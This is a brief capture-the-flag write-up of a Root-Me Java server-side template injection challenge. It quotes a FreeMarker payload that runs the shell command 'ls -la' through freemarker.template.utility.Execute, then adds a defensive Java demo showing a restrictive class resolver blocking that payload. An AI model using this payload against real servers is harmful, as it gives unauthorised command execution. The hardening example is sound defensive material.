Java: Server-side Template Injection (SSTI)

Root-Me challenge "Java - Server-side Template Injection": exploit the vulnerability to retrieve the validation password stored in the file SECRET_FLAG.txt.


PayloadsAllTheThings lists a FreeMarker code execution payload:

${"freemarker.template.utility.Execute"?new()("ls -la")}

etcetera.
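
Added example, not part of the original write-up or the challenge: the payload above only works when FreeMarker's ?new built-in is allowed to instantiate freemarker.template.utility.Execute, so this program renders it under a configuration whose new_builtin_class_resolver rejects every class. The class and helper names are hypothetical, and FreeMarker 2.3.30 or later on Java 11+ is assumed.

```java
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;

import java.io.IOException;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.Map;

// Hypothetical demo class (name is an assumption, not from the page).
public class FreemarkerNewResolverDemo {

    // Payload quoted from the page; it depends on the ?new built-in.
    static final String PAGE_PAYLOAD =
        "${\"freemarker.template.utility.Execute\"?new()(\"ls -la\")}";

    static Configuration hardened() {
        Configuration cfg = new Configuration(Configuration.VERSION_2_3_30);
        // FreeMarker's default is UNRESTRICTED_RESOLVER, which lets ?new load
        // any TemplateModel class, including utility.Execute.
        // ALLOWS_NOTHING_RESOLVER makes every ?new call fail at render time.
        cfg.setNewBuiltinClassResolver(TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);
        return cfg;
    }

    // Renders a template given as a string; reports a rejected template
    // instead of propagating the exception.
    static String render(Configuration cfg, String source) throws IOException {
        StringWriter out = new StringWriter();
        try {
            new Template("user-input", new StringReader(source), cfg)
                .process(Map.of(), out);
            return out.toString();
        } catch (TemplateException e) {
            return "BLOCKED: " + e.getClass().getSimpleName();
        }
    }

    public static void main(String[] args) throws IOException {
        // The page's payload is refused; an ordinary expression still renders.
        System.out.println(render(hardened(), PAGE_PAYLOAD));
        System.out.println(render(hardened(), "${1 + 1}"));
    }
}
```

The resolver is defence in depth: the root cause is that user input reaches the engine as template source rather than as data in the model. TemplateClassResolver.SAFER_RESOLVER is the narrower alternative that blocks Execute, ObjectConstructor and JythonRuntime while leaving other classes available to ?new.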

Resources